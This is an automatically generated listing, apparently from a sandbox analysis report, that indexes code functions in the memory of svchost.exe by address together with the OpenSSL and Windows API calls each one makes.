    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8364A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,55_2_00007FF8B8364A60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838AA70 CRYPTO_realloc,55_2_00007FF8B838AA70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8344A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,55_2_00007FF8B8344A72
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B8354A20
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A6A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83A6A30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B0AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83B0AD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834AAD0 CRYPTO_set_ex_data,55_2_00007FF8B834AAD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8332A80 CRYPTO_free,CRYPTO_free,55_2_00007FF8B8332A80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8346A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,55_2_00007FF8B8346A90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,55_2_00007FF8B833CAB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,55_2_00007FF8B833CB70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838EB20 CRYPTO_free,55_2_00007FF8B838EB20
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A0B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,55_2_00007FF8B83A0B20
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,55_2_00007FF8B839CB30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B0B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B83B0B30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8366B30 CRYPTO_free,CRYPTO_free,55_2_00007FF8B8366B30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,55_2_00007FF8B834ABF0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,55_2_00007FF8B833AB80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,55_2_00007FF8B835CB80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837AB80 CRYPTO_free,55_2_00007FF8B837AB80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8398B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,55_2_00007FF8B8398B90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A8B90 CRYPTO_free,CRYPTO_memdup,55_2_00007FF8B83A8B90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8382BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,55_2_00007FF8B8382BA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8366BB0 CRYPTO_malloc,55_2_00007FF8B8366BB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,55_2_00007FF8B837AC50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BCC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83BCC60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8332C60 CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B8332C60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8338C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,55_2_00007FF8B8338C60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A4CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83A4CC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,55_2_00007FF8B833ECD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8398CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,55_2_00007FF8B8398CA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,55_2_00007FF8B8354CB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,55_2_00007FF8B838ED00
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,55_2_00007FF8B835CD10
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8364D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,55_2_00007FF8B8364D30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834CDC0 CRYPTO_malloc,CRYPTO_clear_free,55_2_00007FF8B834CDC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B838EDD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B0D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83B0D80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833EDB0 CRYPTO_THREAD_run_once,55_2_00007FF8B833EDB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8382DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,55_2_00007FF8B8382DB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838EED0 CRYPTO_malloc,CRYPTO_free,55_2_00007FF8B838EED0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B835CED0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8350EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B8350EF0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8334E80 CRYPTO_free,55_2_00007FF8B8334E80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A6F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83A6F60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8382F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,55_2_00007FF8B8382F60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8382F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,55_2_00007FF8B8382F00
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8336FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,55_2_00007FF8B8336FC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B8FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,55_2_00007FF8B83B8FD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839AFE0 CRYPTO_free,55_2_00007FF8B839AFE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837CFF0 CRYPTO_realloc,55_2_00007FF8B837CFF0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8392FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B8392FA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,55_2_00007FF8B839EFA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B839B040
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8355040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B8355040
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8383040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,55_2_00007FF8B8383040
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8345050 CRYPTO_set_ex_data,55_2_00007FF8B8345050
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8345070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,55_2_00007FF8B8345070
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8351000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B8351000
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B833D010
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8331030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,55_2_00007FF8B8331030
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83650D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,55_2_00007FF8B83650D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A10E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83A10E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,55_2_00007FF8B838F0F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B1090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83B1090
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,55_2_00007FF8B833B0B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8358140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B8358140
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8388160 CRYPTO_memdup,55_2_00007FF8B8388160
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,55_2_00007FF8B8354160
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354120 CRYPTO_set_ex_data,55_2_00007FF8B8354120
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8378120 CRYPTO_free,55_2_00007FF8B8378120
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8340130 CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B8340130
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8380130 CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B8380130
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838A1D0 CRYPTO_realloc,55_2_00007FF8B838A1D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83481E0 CRYPTO_get_ex_data,55_2_00007FF8B83481E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83721E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,55_2_00007FF8B83721E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,55_2_00007FF8B839C190
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B6190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,55_2_00007FF8B83B6190
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8346190 CRYPTO_malloc,CRYPTO_free,55_2_00007FF8B8346190
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83841B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,55_2_00007FF8B83841B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,55_2_00007FF8B8354260
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,55_2_00007FF8B834E220
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B02C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83B02C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83362C0 CRYPTO_clear_free,55_2_00007FF8B83362C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835C2C0 CRYPTO_free,55_2_00007FF8B835C2C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,55_2_00007FF8B837A2C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,55_2_00007FF8B839A2E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B82E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83B82E7
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83922F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83922F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83402B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,55_2_00007FF8B83402B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A0340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,55_2_00007FF8B83A0340
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,55_2_00007FF8B834A330
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8364330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,55_2_00007FF8B8364330
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,55_2_00007FF8B836A330
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83323C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83323C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83723F0 CRYPTO_free,55_2_00007FF8B83723F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,55_2_00007FF8B8354380
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8350450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,55_2_00007FF8B8350450
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83B844C
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B4460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,55_2_00007FF8B83B4460
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8332460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,55_2_00007FF8B8332460
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8372470 CRYPTO_zalloc,55_2_00007FF8B8372470
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8368400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,55_2_00007FF8B8368400
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B8414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,55_2_00007FF8B83B8414
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B8426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,55_2_00007FF8B83B8426
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83424D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,55_2_00007FF8B83424D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,55_2_00007FF8B8354490
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B2500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,55_2_00007FF8B83B2500
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,55_2_00007FF8B836E510
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,55_2_00007FF8B837A5C0
